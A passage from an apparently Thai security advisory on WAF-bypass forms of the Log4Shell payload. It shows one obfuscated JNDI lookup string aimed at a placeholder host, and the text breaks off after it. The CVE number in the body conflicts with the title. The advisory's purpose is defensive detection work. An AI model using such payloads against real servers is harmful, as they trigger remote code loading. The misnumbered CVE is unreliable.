ตรวจสอบการโจมตี CVE-2021-44228 LOG4SHELL ในรูปแบบ Bypass WAF Signature

จากข่าวช่องโหว่ CVE2011-42288 Log4shell ทีมงาน Application Security ของทาง I-SECURE ได้มีการติดตามในส่วนของ WAF Signature เพิ่มเติม เพื่อตรวจสอบในส่วนของ Bypass WAF อยู่ 7 รูปแบบ ได้แก่
1. ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://asdasd.